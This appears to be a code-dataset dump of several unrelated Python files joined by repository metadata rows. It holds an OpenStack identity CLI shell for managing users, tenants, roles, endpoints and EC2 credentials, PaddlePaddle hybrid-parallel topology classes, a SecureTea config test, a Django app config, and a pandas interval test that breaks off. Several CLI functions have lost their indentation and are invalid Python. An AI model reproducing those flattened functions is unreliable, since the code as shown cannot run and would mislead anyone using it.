    """Decorator: fail fast when the client has no service catalog.

    Commands that look up endpoints or tokens need a service catalog,
    which is only available when authenticating against an auth URL
    (not a raw --os-endpoint / OS_SERVICE_ENDPOINT).

    Fix: functools.wraps preserves the wrapped command's __name__ and
    __doc__ -- the shell derives command help from the docstring, which
    was lost before.
    """
    msg = ('Configuration error: Client configured to run without a service '
           'catalog. Run the client using --os-auth-url or OS_AUTH_URL, '
           'instead of --os-endpoint or OS_SERVICE_ENDPOINT, for example.')

    @functools.wraps(f)
    def wrapped(kc, args):
        if not kc.has_service_catalog():
            raise Exception(msg)
        return f(kc, args)
    return wrapped
@utils.arg('--tenant-id', metavar='<tenant-id>',
           help='Tenant ID; lists all users if not specified')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_list(kc, args):
    """List users"""
    # tenant_id=None lists every user in the deployment
    user_list = kc.users.list(tenant_id=args.tenant_id)
    columns = ['id', 'name', 'enabled', 'email']
    utils.print_list(user_list, columns, order_by='name')
@utils.arg('user', metavar='<user>', help='Name or ID of user to display')
def do_user_get(kc, args):
    """Display user details."""
    target = utils.find_resource(kc.users, args.user)
    utils.print_dict(target._info)
@utils.arg('--name', metavar='<user-name>', required=True,
           help='New user name (must be unique)')
@utils.arg('--tenant-id', metavar='<tenant-id>',
           help='New user default tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
@utils.arg('--pass', metavar='<pass>', dest='passwd',
           help='New user password')
@utils.arg('--email', metavar='<email>',
           help='New user email address')
@utils.arg('--enabled', metavar='<true|false>', default=True,
           help='Initial user enabled status (default true)')
def do_user_create(kc, args):
    """Create new user"""
    enabled = utils.string_to_bool(args.enabled)
    new_user = kc.users.create(args.name, args.passwd, args.email,
                               tenant_id=args.tenant_id, enabled=enabled)
    utils.print_dict(new_user._info)
@utils.arg('--name', metavar='<user-name>',
help='Desired new user name')
@utils.arg('--email', metavar='<email>',
help='Desired new email address')
@utils.arg('--enabled', metavar='<true|false>',
help='Enable or disable user')
@utils.arg('user', metavar='<user>', help='Name or ID of user to update')
def do_user_update(kc, args):
"""Update user's name, email, and enabled status"""
kwargs = {}
if args.name:
kwargs['name'] = args.name
if args.email:
kwargs['email'] = args.email
if args.enabled:
kwargs['enabled'] = utils.string_to_bool(args.enabled)
if not len(kwargs):
print "User not updated, no arguments present."
return
user = utils.find_resource(kc.users, args.user)
try:
kc.users.update(user, **kwargs)
print 'User has been updated.'
except Exception as e:
print 'Unable to update user: %s' % e
@utils.arg('--pass', metavar='<password>', dest='passwd', required=True,
           help='Desired new password')
@utils.arg('user', metavar='<user>',
           help='Name or ID of user to update password')
def do_user_password_update(kc, args):
    """Update user password"""
    target = utils.find_resource(kc.users, args.user)
    kc.users.update_password(target, args.passwd)
@utils.arg('--current-password', metavar='<current-password>',
           dest='currentpasswd', required=False, help='Current password, '
                                                      'Defaults to the password as set by --os-password or '
                                                      'OS_PASSWORD')
@utils.arg('--new-password ', metavar='<new-password>', dest='newpasswd',
           required=False, help='Desired new password')
def do_password_update(kc, args):
    """Update own password"""
    # Prompt for any password not passed on the command line, so secrets
    # do not end up in shell history etc.
    current = args.currentpasswd
    if current is None:
        current = args.os_password
    if current is None:
        current = getpass.getpass('Current Password: ')
    new = args.newpasswd
    while new is None:
        # keep prompting until both entries match
        first = getpass.getpass('New Password: ')
        second = getpass.getpass('Repeat New Password: ')
        if first == second:
            new = first
    kc.users.update_own_password(current, new)
    if args.os_password != new:
        print ("You should update the password you are using to authenticate "
               "to match your new password")
@utils.arg('user', metavar='<user>', help='Name or ID of user to delete')
def do_user_delete(kc, args):
    """Delete user"""
    target = utils.find_resource(kc.users, args.user)
    kc.users.delete(target)
def do_tenant_list(kc, args):
    """List all tenants"""
    columns = ['id', 'name', 'enabled']
    utils.print_list(kc.tenants.list(), columns, order_by='name')
@utils.arg('tenant', metavar='<tenant>',
           help='Name or ID of tenant to display')
def do_tenant_get(kc, args):
    """Display tenant details"""
    target = utils.find_resource(kc.tenants, args.tenant)
    utils.print_dict(target._info)
@utils.arg('--name', metavar='<tenant-name>', required=True,
           help='New tenant name (must be unique)')
@utils.arg('--description', metavar='<tenant-description>', default=None,
           help='Description of new tenant (default is none)')
@utils.arg('--enabled', metavar='<true|false>', default=True,
           help='Initial tenant enabled status (default true)')
def do_tenant_create(kc, args):
    """Create new tenant"""
    enabled = utils.string_to_bool(args.enabled)
    new_tenant = kc.tenants.create(args.name,
                                   description=args.description,
                                   enabled=enabled)
    utils.print_dict(new_tenant._info)
@utils.arg('--name', metavar='<tenant_name>',
help='Desired new name of tenant')
@utils.arg('--description', metavar='<tenant-description>', default=None,
help='Desired new description of tenant')
@utils.arg('--enabled', metavar='<true|false>',
help='Enable or disable tenant')
@utils.arg('tenant', metavar='<tenant>', help='Name or ID of tenant to update')
def do_tenant_update(kc, args):
"""Update tenant name, description, enabled status"""
tenant = utils.find_resource(kc.tenants, args.tenant)
kwargs = {}
if args.name:
kwargs.update({'name': args.name})
if args.description is not None:
kwargs.update({'description': args.description})
if args.enabled:
kwargs.update({'enabled': utils.string_to_bool(args.enabled)})
if kwargs == {}:
print "Tenant not updated, no arguments present."
return
tenant.update(**kwargs)
@utils.arg('tenant', metavar='<tenant>', help='Name or ID of tenant to delete')
def do_tenant_delete(kc, args):
    """Delete tenant"""
    target = utils.find_resource(kc.tenants, args.tenant)
    kc.tenants.delete(target)
@utils.arg('--name', metavar='<name>', required=True,
           help='Name of new service (must be unique)')
@utils.arg('--type', metavar='<type>', required=True,
           help='Service type (one of: identity, compute, network, '
                'image, or object-store)')
@utils.arg('--description', metavar='<service-description>',
           help='Description of service')
def do_service_create(kc, args):
    """Add service to Service Catalog"""
    new_service = kc.services.create(args.name, args.type, args.description)
    utils.print_dict(new_service._info)
def do_service_list(kc, args):
    """List all services in Service Catalog"""
    columns = ['id', 'name', 'type', 'description']
    utils.print_list(kc.services.list(), columns, order_by='name')
@utils.arg('service', metavar='<service>',
           help='Name or ID of service to display')
def do_service_get(kc, args):
    """Display service from Service Catalog"""
    target = utils.find_resource(kc.services, args.service)
    utils.print_dict(target._info)
@utils.arg('service', metavar='<service>',
           help='Name or ID of service to delete')
def do_service_delete(kc, args):
    """Delete service from Service Catalog"""
    target = utils.find_resource(kc.services, args.service)
    kc.services.delete(target.id)
def do_role_list(kc, args):
    """List all roles"""
    columns = ['id', 'name']
    utils.print_list(kc.roles.list(), columns, order_by='name')
@utils.arg('role', metavar='<role>', help='Name or ID of role to display')
def do_role_get(kc, args):
    """Display role details"""
    target = utils.find_resource(kc.roles, args.role)
    utils.print_dict(target._info)
@utils.arg('--name', metavar='<role-name>', required=True,
           help='Name of new role')
def do_role_create(kc, args):
    """Create new role"""
    new_role = kc.roles.create(args.name)
    utils.print_dict(new_role._info)
@utils.arg('role', metavar='<role>', help='Name or ID of role to delete')
def do_role_delete(kc, args):
    """Delete role"""
    target = utils.find_resource(kc.roles, args.role)
    kc.roles.delete(target)
@utils.arg('--user', '--user-id', '--user_id', metavar='<user>',
           required=True, help='Name or ID of user')
@utils.arg('--role', '--role-id', '--role_id', metavar='<role>',
           required=True, help='Name or ID of role')
@utils.arg('--tenant', '--tenant-id', metavar='<tenant>',
           help='Name or ID of tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_role_add(kc, args):
    """Add role to user"""
    user = utils.find_resource(kc.users, args.user)
    role = utils.find_resource(kc.roles, args.role)
    # --tenant (name or ID) takes precedence over the raw --tenant_id
    tenant = None
    if args.tenant:
        tenant = utils.find_resource(kc.tenants, args.tenant)
    elif args.tenant_id:
        tenant = args.tenant_id
    kc.roles.add_user_role(user, role, tenant)
@utils.arg('--user', '--user-id', '--user_id', metavar='<user>',
           required=True, help='Name or ID of user')
@utils.arg('--role', '--role-id', '--role_id', metavar='<role>',
           required=True, help='Name or ID of role')
@utils.arg('--tenant', '--tenant-id', metavar='<tenant>',
           help='Name or ID of tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_role_remove(kc, args):
    """Remove role from user"""
    user = utils.find_resource(kc.users, args.user)
    role = utils.find_resource(kc.roles, args.role)
    # --tenant (name or ID) takes precedence over the raw --tenant_id
    tenant = None
    if args.tenant:
        tenant = utils.find_resource(kc.tenants, args.tenant)
    elif args.tenant_id:
        tenant = args.tenant_id
    kc.roles.remove_user_role(user, role, tenant)
@utils.arg('--user', '--user-id', metavar='<user>',
           help='List roles granted to a user')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--tenant', '--tenant-id', metavar='<tenant>',
           help='List roles granted on a tenant')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_user_role_list(kc, args):
    """List roles granted to a user"""
    if args.tenant:
        tenant_id = utils.find_resource(kc.tenants, args.tenant).id
    else:
        # fall back to the raw ID flag, then the authenticated tenant
        tenant_id = args.tenant_id or kc.auth_tenant_id
    if args.user:
        user_id = utils.find_resource(kc.users, args.user).id
    else:
        # fall back to the raw ID flag, then the authenticated user
        user_id = args.user_id or kc.auth_user_id
    roles = kc.roles.roles_for_user(user=user_id, tenant=tenant_id)
    # this makes the command output a bit more intuitive
    for role in roles:
        role.user_id = user_id
        role.tenant_id = tenant_id
    columns = ['id', 'name', 'user_id', 'tenant_id']
    utils.print_list(roles, columns, order_by='name')
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--tenant-id', metavar='<tenant-id>', help='Tenant ID')
@utils.arg('--tenant_id', help=argparse.SUPPRESS)
def do_ec2_credentials_create(kc, args):
    """Create EC2-compatible credentials for user per tenant"""
    # default to the authenticated tenant/user when not given explicitly
    args.tenant_id = args.tenant_id or kc.auth_tenant_id
    args.user_id = args.user_id or kc.auth_user_id
    creds = kc.ec2.create(args.user_id, args.tenant_id)
    utils.print_dict(creds._info)
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--access', metavar='<access-key>', required=True,
           help='Access Key')
def do_ec2_credentials_get(kc, args):
    """Display EC2-compatible credentials"""
    # default to the authenticated user when not given explicitly
    args.user_id = args.user_id or kc.auth_user_id
    credential = kc.ec2.get(args.user_id, args.access)
    if credential:
        utils.print_dict(credential._info)
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
def do_ec2_credentials_list(kc, args):
    """List EC2-compatible credentials for a user"""
    # default to the authenticated user when not given explicitly
    args.user_id = args.user_id or kc.auth_user_id
    credentials = kc.ec2.list(args.user_id)
    for item in credentials:
        try:
            item.tenant = getattr(kc.tenants.get(item.tenant_id), 'name')
        except Exception:
            # FIXME(dtroyer): Retrieving the tenant name fails for normal
            # users; stuff in the tenant_id instead.
            item.tenant = item.tenant_id
    utils.print_list(credentials, ['tenant', 'access', 'secret'])
@utils.arg('--user-id', metavar='<user-id>', help='User ID')
@utils.arg('--user_id', help=argparse.SUPPRESS)
@utils.arg('--access', metavar='<access-key>', required=True,
help='Access Key')
def do_ec2_credentials_delete(kc, args):
"""Delete EC2-compatible credentials"""
if not args.user_id:
# use the authenticated user id as a default
args.user_id = kc.auth_user_id
try:
kc.ec2.delete(args.user_id, args.access)
print 'Credential has been deleted.'
except Exception as e:
print 'Unable to delete credential: %s' % e
@utils.arg('--service', metavar='<service-type>', default=None,
help='Service type to return')
@require_service_catalog
def do_catalog(kc, args):
"""List service catalog, possibly filtered by service."""
endpoints = kc.service_catalog.get_endpoints(service_type=args.service)
for (service, service_endpoints) in endpoints.iteritems():
if len(service_endpoints) > 0:
print "Service: %s" % service
for ep in service_endpoints:
utils.print_dict(ep)
@utils.arg('--service', metavar='<service-type>', required=True,
help='Service type to select')
@utils.arg('--endpoint-type', metavar='<endpoint-type>', default='publicURL',
help='Endpoint type to select')
@utils.arg('--endpoint_type', default='publicURL',
help=argparse.SUPPRESS)
@utils.arg('--attr', metavar='<service-attribute>',
help='Service attribute to match for selection')
@utils.arg('--value', metavar='<value>',
help='Value of attribute to match')
@require_service_catalog
def do_endpoint_get(kc, args):
"""Find endpoint filtered by a specific attribute or service type"""
kwargs = {
'service_type': args.service,
'endpoint_type': args.endpoint_type,
}
if args.attr and args.value:
kwargs.update({'attr': args.attr, 'filter_value': args.value})
elif args.attr or args.value:
print 'Both --attr and --value required.'
return
url = kc.service_catalog.url_for(**kwargs)
utils.print_dict({'%s.%s' % (args.service, args.endpoint_type): url})
def do_endpoint_list(kc, args):
    """List configured service endpoints"""
    columns = ['id', 'region', 'publicurl',
               'internalurl', 'adminurl', 'service_id']
    utils.print_list(kc.endpoints.list(), columns)
@utils.arg('--region', metavar='<endpoint-region>',
           help='Endpoint region', default='regionOne')
@utils.arg('--service-id', '--service_id', metavar='<service-id>',
           required=True, help='ID of service associated with Endpoint')
@utils.arg('--publicurl', metavar='<public-url>',
           help='Public URL endpoint')
@utils.arg('--adminurl', metavar='<admin-url>',
           help='Admin URL endpoint')
@utils.arg('--internalurl', metavar='<internal-url>',
           help='Internal URL endpoint')
def do_endpoint_create(kc, args):
    """Create a new endpoint associated with a service"""
    new_endpoint = kc.endpoints.create(args.region, args.service_id,
                                       args.publicurl, args.adminurl,
                                       args.internalurl)
    utils.print_dict(new_endpoint._info)
@utils.arg('id', metavar='<endpoint-id>', help='ID of endpoint to delete')
def do_endpoint_delete(kc, args):
    """Delete a service endpoint"""
    try:
        kc.endpoints.delete(args.id)
        print 'Endpoint has been deleted.'
    except Exception:
        # Best-effort CLI behavior: report failure instead of tracebacking.
        print 'Unable to delete endpoint.'
@utils.arg('--wrap', metavar='<integer>', default=0,
           help='wrap PKI tokens to a specified length, or 0 to disable')
@require_service_catalog
def do_token_get(kc, args):
    """Display the current user token"""
    # wrap=0 disables wrapping; any other value wraps the (long) PKI token
    # string at that column when printing.
    utils.print_dict(kc.service_catalog.get_token(),
                     wrap=int(args.wrap))
| 36.68254 | 79 | 0.640307 |
8f38ba447fcb3d59a2c609dacff7c921f01935fd | 8,820 | py | Python | python/paddle/distributed/fleet/base/topology.py | andreazanetti/Paddle | a259076dd01801e2e619237da02235a4856a96bb | [
"Apache-2.0"
] | 1 | 2021-04-28T13:47:27.000Z | 2021-04-28T13:47:27.000Z | python/paddle/distributed/fleet/base/topology.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | python/paddle/distributed/fleet/base/topology.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import paddle
import collections
import numpy as np
from itertools import product
from functools import reduce
from ..utils.log_util import logger
__all__ = ['CommunicateTopology', 'HybridCommunicateGroup']
_HYBRID_PARALLEL_GROUP = None
class ParallelMode(object):
    """Enumeration of the supported hybrid-parallel execution modes."""

    # Integer codes are part of the public contract; keep them stable.
    DATA_PARALLEL, MODEL_PARALLEL, PIPELINE_PARALLEL = 0, 1, 2
class CommunicateTopology(object):
    """Maps ranks of a hybrid-parallel world to per-axis coordinates.

    The cartesian product of ``dims`` defines one coordinate (a namedtuple
    over ``hybrid_group_names``) per global rank, assigned in lexicographic
    order.  The class answers rank <-> coordinate queries and enumerates
    communication groups along any axis.
    """

    def __init__(self,
                 hybrid_group_names=None,
                 dims=None):
        # None sentinels instead of mutable list defaults: the previous
        # ``=["data", "pipe", "model"]`` / ``=[1, 1, 1]`` defaults were
        # shared across calls and could be mutated by one caller for all.
        self._parallel_names = (["data", "pipe", "model"]
                                if hybrid_group_names is None
                                else hybrid_group_names)
        self._dims = [1, 1, 1] if dims is None else dims
        self.coordinate = collections.namedtuple('Coordinate',
                                                 self._parallel_names)
        self._world_size = reduce(lambda x, y: x * y, self._dims)
        # Enumerate all coordinates in lexicographic order; index == rank.
        ranges = [range(d) for d in self._dims]
        all_coordinate = [self.coordinate(*x) for x in product(*ranges)]
        self._coord2rank = dict(zip(all_coordinate, range(len(all_coordinate))))
        self._rank2coord = dict(
            zip(self._coord2rank.values(), self._coord2rank.keys()))

    def get_hybrid_group_names(self):
        """Return the axis names, e.g. ["data", "pipe", "model"]."""
        return self._parallel_names

    def get_dim(self, axis_name):
        """Return the parallel degree of the named axis."""
        return self._dims[self._parallel_names.index(axis_name)]

    def world_size(self):
        """Total number of ranks (the product of all dims)."""
        return self._world_size

    def get_rank(self, **args):
        """Return the global rank of the coordinate given as per-axis kwargs."""
        assert len(args) == len(self._dims)
        key = self.coordinate(**args)
        assert key in self._coord2rank
        return self._coord2rank[key]

    def get_coord(self, rank):
        """Return the coordinate namedtuple of a global rank."""
        assert rank < self._world_size
        assert rank in self._rank2coord
        return self._rank2coord[rank]

    def get_axis_list(self, axis_name, index):
        """Return sorted ranks whose coordinate on ``axis_name`` equals ``index``."""
        axis = self._parallel_names.index(axis_name)
        ranks = [
            self._coord2rank[coord] for coord in self._coord2rank.keys()
            if coord[axis] == index
        ]
        ranks.sort()
        return ranks

    def get_dim_size(self, axis_name):
        """Like get_dim, with an explicit axis-name validity check."""
        assert axis_name in self._parallel_names
        return self._dims[self._parallel_names.index(axis_name)]

    def get_comm_list(self, axis_name):
        """Enumerate communication groups that vary only along ``axis_name``.

        Returns one list of ranks per combination of the other axes'
        coordinates; each inner list forms one communicator group.
        """
        assert axis_name in self._parallel_names
        other_axis_names = [
            name for name in self._parallel_names if name != axis_name
        ]
        ranges = []
        for name in other_axis_names:
            dim_num = self.get_dim_size(name)
            ranges.append(range(dim_num))
        all_result = []
        for x in product(*ranges):
            # Fix the other axes' coordinates, then sweep axis_name.
            key_coord = {}
            for other_name in other_axis_names:
                key_coord[other_name] = x[other_axis_names.index(other_name)]
            result = []
            for i in range(0, self.get_dim_size(axis_name)):
                key_coord[axis_name] = i
                result.append(self._coord2rank[self.coordinate(**key_coord)])
            all_result.append(result)
        return all_result
class HybridCommunicateGroup(object):
    """Builds and owns the data/model/pipeline communication groups for the
    hybrid-parallel topology of the current distributed job, and registers
    itself as the process-wide _HYBRID_PARALLEL_GROUP singleton."""
    def __init__(self, topology):
        self.nranks = paddle.distributed.get_world_size()
        self.global_rank = paddle.distributed.get_rank()
        self._topo = topology
        self._dp_degree = self._topo.get_dim('data')
        self._mp_degree = self._topo.get_dim('model')
        self._pp_degree = self._topo.get_dim('pipe')
        self._data_parallel_id = self._get_data_parallel_id()
        self._model_parallel_id = self._get_model_parallel_id()
        self.stage_id = self._get_pipe_parallel_id()
        assert self._check_vaild_topo(
        ), "Here is an unreasonable topogy setting. world_size: {}, but" \
            "dp_num: {}, mp_num: {}, pp_num: {}".format(self.nranks, self._dp_degree,
                                                        self._mp_degree, self._pp_degree)
        # create comm group for data parallel
        self._dp_group, self._dp_comm_group = self._set_comm_group("data")
        # create comm group for model parallel
        self._mp_group, self._mp_comm_group = self._set_comm_group("model")
        # create comm group for pipe parallel
        self._pp_group, self._pp_comm_group = self._set_comm_group("pipe")
        # create global group for check inf_nan / clip global norm
        self._check_group, self._check_comm_group = self._set_check_group(
            "data")
        # create p2p group
        self.is_first_stage = (self.stage_id == 0)
        self.is_last_stage = (self.stage_id == (self._pp_degree - 1))
        debug_str = "HybridParallelInfo: rank_id: %d, dp_degree: %d, " \
                    "mp_degree: %d, pp_degree: %d" % (self.global_rank, self._dp_degree,
                                                      self._mp_degree,self._pp_degree)
        debug_str += "dp_group: %s, mp_group: %s, pp_group: %s, check/clip group: %s" % (
            self._dp_group, self._mp_group, self._pp_group, self._check_group)
        logger.info(debug_str)
        # Register this instance as the module-level singleton so other
        # code can look up the current hybrid-parallel configuration.
        global _HYBRID_PARALLEL_GROUP
        _HYBRID_PARALLEL_GROUP = self
    def get_parallel_mode(self):
        # there are three modes : DataParallel / ModelParallel / PipelineParallel
        # NOTE(review): implicitly returns None if none of the branches
        # match (cannot happen for degrees >= 1, but worth confirming).
        if self._mp_degree == 1 and self._pp_degree == 1:
            return ParallelMode.DATA_PARALLEL
        elif self._mp_degree > 1 and self._pp_degree == 1:
            # initialize the seed
            return ParallelMode.MODEL_PARALLEL
        elif self._pp_degree > 1:
            return ParallelMode.PIPELINE_PARALLEL
    def _check_vaild_topo(self):
        # True when the product of the parallel degrees equals the world
        # size.  NOTE(review): method name has a typo ("vaild"); kept as-is
        # since other code may reference it.
        return self._dp_degree * self._mp_degree * self._pp_degree == self.nranks
    def _set_comm_group(self, parallel_method="data"):
        # Create one communication group per ranks-list along the given
        # axis.  Every rank iterates all groups (new_group is collective),
        # then keeps the group that contains itself.
        parallel_group = []
        parallel_comm_group = None
        parallel_groups = self._topo.get_comm_list(parallel_method)
        for group in parallel_groups:
            comm_group = paddle.distributed.new_group(ranks=group)
            if self.global_rank in group:
                parallel_group = group
                parallel_comm_group = comm_group
        assert len(parallel_group) > 0
        assert parallel_comm_group is not None
        return parallel_group, parallel_comm_group
    def _set_check_group(self, parallel_method="data"):
        # Group ranks that share the same coordinate index on the given
        # axis; used for global inf/nan checks and grad-norm clipping.
        parallel_group = []
        parallel_comm_group = None
        parallel_size = self._topo.get_dim(parallel_method)
        for idx in range(parallel_size):
            parallel_groups = self._topo.get_axis_list(parallel_method, idx)
            comm_group = paddle.distributed.new_group(ranks=parallel_groups)
            if self.global_rank in parallel_groups:
                parallel_group = parallel_groups
                parallel_comm_group = comm_group
        assert len(parallel_group) > 0
        assert parallel_comm_group is not None
        return parallel_group, parallel_comm_group
    def topology(self):
        return self._topo
    def get_global_rank(self):
        return self.global_rank
    # data parallel message:
    def _get_data_parallel_id(self):
        return self._topo.get_coord(self.global_rank).data
    def get_data_parallel_rank(self):
        return self._data_parallel_id
    def get_data_parallel_world_size(self):
        return self._dp_degree
    def get_data_parallel_group(self):
        return self._dp_comm_group
    def get_data_parallel_group_src_rank(self):
        # First rank in the group acts as the broadcast source.
        return self._dp_comm_group.ranks[0]
    # model parallel message:
    def _get_model_parallel_id(self):
        return self._topo.get_coord(self.global_rank).model
    def get_model_parallel_rank(self):
        return self._model_parallel_id
    def get_model_parallel_world_size(self):
        return self._mp_degree
    def get_model_parallel_group(self):
        return self._mp_comm_group
    def get_model_parallel_group_src_rank(self):
        return self._mp_comm_group.ranks[0]
    # pipeline parallel message
    def _get_pipe_parallel_id(self):
        return self._topo.get_coord(self.global_rank).pipe
    def get_stage_id(self):
        return self.stage_id
    def get_pipe_parallel_world_size(self):
        return self._pp_degree
    def get_pipe_parallel_group(self):
        return self._pp_comm_group
    # check parallel group
    def get_check_parallel_group(self):
        return self._check_comm_group
| 34.453125 | 89 | 0.665306 |
9af731bd4ac9df7164b23a089b91fefc267da7f6 | 1,596 | py | Python | test/test_configurations.py | idresearchdev/SecureTea-Project | 6ddd47f4897c0d22ade520bcc07197dcd3a0e2a4 | [
"MIT"
] | 1 | 2019-03-26T11:01:03.000Z | 2019-03-26T11:01:03.000Z | test/test_configurations.py | idresearchdev/SecureTea-Project | 6ddd47f4897c0d22ade520bcc07197dcd3a0e2a4 | [
"MIT"
] | null | null | null | test/test_configurations.py | idresearchdev/SecureTea-Project | 6ddd47f4897c0d22ade520bcc07197dcd3a0e2a4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import unittest
from securetea import configurations
import argparse
import json
try:
# if python 3.x.x
from unittest.mock import patch
except ImportError: # python 2.x.x
from mock import patch
class TestConfigurations(unittest.TestCase):
    """
    Test class for Configurations.
    """
    def setUp(self):
        """
        Setup test class for Configurations.
        """
        # Setup configurations object
        self.conf_obj = configurations.SecureTeaConf()
        # Path of the reference config file read by the tests below.
        self._CONFIG_PATH = 'securetea.conf'
        # Load credentials
        with open(self._CONFIG_PATH) as f:
            self.creds = json.load(f)
        # Minimal stand-in credentials used when json.load is mocked out.
        self.dummy_dict = {
            "Key1": "Value1"
        }
    def test_get_json(self):
        """
        Test get_json.
        """
        # get_json should parse the same file loaded directly in setUp.
        self.assertEqual(self.creds,
                         self.conf_obj.get_json(path='securetea.conf'))
    @patch('securetea.configurations.json')
    def test_get_creds(self, mock_json):
        """
        Test get_creds.
        """
        # Force json.load to return the dummy credentials regardless of
        # which config path the parsed arguments point at.
        mock_json.load.return_value = self.dummy_dict
        parser = argparse.ArgumentParser()
        parser.add_argument('--conf',
                            type=str)
        args = parser.parse_args()
        creds = self.conf_obj.get_creds(args)
        self.assertEqual(self.dummy_dict, creds)
    @patch('securetea.configurations.os')
    def test_save_creds(self, mock_os):
        """
        Test save_creds.
        """
        # save_creds is expected to create the target directory tree via
        # os.makedirs (os is mocked, so nothing touches the filesystem).
        self.conf_obj.save_creds(data=self.dummy_dict)
        self.assertTrue(mock_os.makedirs.called)
1c804b5b2c7da5e3e9977c24fc8c67eef0330723 | 94 | py | Python | admin_user/apps.py | lurdray/medexpress_app | f6b6cae3a0646697ee142305904ee6cfa44a0cf8 | [
"MIT"
] | null | null | null | admin_user/apps.py | lurdray/medexpress_app | f6b6cae3a0646697ee142305904ee6cfa44a0cf8 | [
"MIT"
] | 1 | 2019-05-22T15:05:44.000Z | 2019-05-22T15:05:44.000Z | admin_user/apps.py | lurdray/medexpress_app | f6b6cae3a0646697ee142305904ee6cfa44a0cf8 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class AdminUserConfig(AppConfig):
name = 'admin_user'
| 15.666667 | 33 | 0.765957 |
4473d86fa04a19fdf4a900054c93de75ea8296ab | 10,369 | py | Python | venv/lib/python3.9/site-packages/pandas/tests/arithmetic/test_interval.py | qarik-hanrattyjen/apache-airflow-backport-providers-google-2021.3.3 | 630dcef73e6a258b6e9a52f934e2dd912ce741f8 | [
"Apache-2.0"
] | 1 | 2021-10-04T18:22:12.000Z | 2021-10-04T18:22:12.000Z | venv/lib/python3.9/site-packages/pandas/tests/arithmetic/test_interval.py | qarik-hanrattyjen/apache-airflow-backport-providers-google-2021.3.3 | 630dcef73e6a258b6e9a52f934e2dd912ce741f8 | [
"Apache-2.0"
] | 10 | 2021-06-16T20:48:32.000Z | 2021-10-04T18:22:02.000Z | venv/lib/python3.9/site-packages/pandas/tests/arithmetic/test_interval.py | qarik-hanrattyjen/apache-airflow-backport-providers-google-2021.3.3 | 630dcef73e6a258b6e9a52f934e2dd912ce741f8 | [
"Apache-2.0"
] | 2 | 2021-07-12T13:33:42.000Z | 2021-08-13T09:52:35.000Z | import operator
import numpy as np
import pytest
from pandas.core.dtypes.common import is_list_like
import pandas as pd
from pandas import (
Categorical,
Index,
Interval,
IntervalIndex,
Period,
Series,
Timedelta,
Timestamp,
date_range,
period_range,
timedelta_range,
)
import pandas._testing as tm
from pandas.core.arrays import IntervalArray
@pytest.fixture(
    params=[
        (Index([0, 2, 4, 4]), Index([1, 3, 5, 8])),
        (Index([0.0, 1.0, 2.0, np.nan]), Index([1.0, 2.0, 3.0, np.nan])),
        (
            timedelta_range("0 days", periods=3).insert(4, pd.NaT),
            timedelta_range("1 day", periods=3).insert(4, pd.NaT),
        ),
        (
            date_range("20170101", periods=3).insert(4, pd.NaT),
            date_range("20170102", periods=3).insert(4, pd.NaT),
        ),
        (
            date_range("20170101", periods=3, tz="US/Eastern").insert(4, pd.NaT),
            date_range("20170102", periods=3, tz="US/Eastern").insert(4, pd.NaT),
        ),
    ],
    ids=lambda x: str(x[0].dtype),
)
def left_right_dtypes(request):
    """
    Fixture for building an IntervalArray from various dtypes
    """
    # Each param is a (left, right) pair of endpoint arrays; the datetime
    # and timedelta flavors append a missing value via .insert(4, pd.NaT).
    return request.param
@pytest.fixture
def array(left_right_dtypes):
    """
    Fixture to generate an IntervalArray of various dtypes containing NA if possible
    """
    # Pairs each left endpoint with the matching right endpoint; the
    # closed side defaults to IntervalArray.from_arrays' default.
    left, right = left_right_dtypes
    return IntervalArray.from_arrays(left, right)
def create_categorical_intervals(left, right, closed="right"):
    """Return a Categorical whose values are the given intervals."""
    intervals = IntervalIndex.from_arrays(left, right, closed)
    return Categorical(intervals)
def create_series_intervals(left, right, closed="right"):
    """Return a Series backed by an IntervalArray of the given intervals."""
    values = IntervalArray.from_arrays(left, right, closed)
    return Series(values)
def create_series_categorical_intervals(left, right, closed="right"):
    """Return a Series backed by a Categorical of the given intervals."""
    index = IntervalIndex.from_arrays(left, right, closed)
    return Series(Categorical(index))
class TestComparison:
    """Elementwise == / != comparisons of IntervalArray against scalars,
    interval containers, and arbitrary list-likes, checked against a naive
    per-element reference implementation."""
    @pytest.fixture(params=[operator.eq, operator.ne])
    def op(self, request):
        return request.param
    @pytest.fixture(
        params=[
            IntervalArray.from_arrays,
            IntervalIndex.from_arrays,
            create_categorical_intervals,
            create_series_intervals,
            create_series_categorical_intervals,
        ],
        ids=[
            "IntervalArray",
            "IntervalIndex",
            "Categorical[Interval]",
            "Series[Interval]",
            "Series[Categorical[Interval]]",
        ],
    )
    def interval_constructor(self, request):
        """
        Fixture for all pandas native interval constructors.
        To be used as the LHS of IntervalArray comparisons.
        """
        return request.param
    def elementwise_comparison(self, op, array, other):
        """
        Helper that performs elementwise comparisons between `array` and `other`
        """
        other = other if is_list_like(other) else [other] * len(array)
        expected = np.array([op(x, y) for x, y in zip(array, other)])
        if isinstance(other, Series):
            return Series(expected, index=other.index)
        return expected
    def test_compare_scalar_interval(self, op, array):
        # matches first interval
        other = array[0]
        result = op(array, other)
        expected = self.elementwise_comparison(op, array, other)
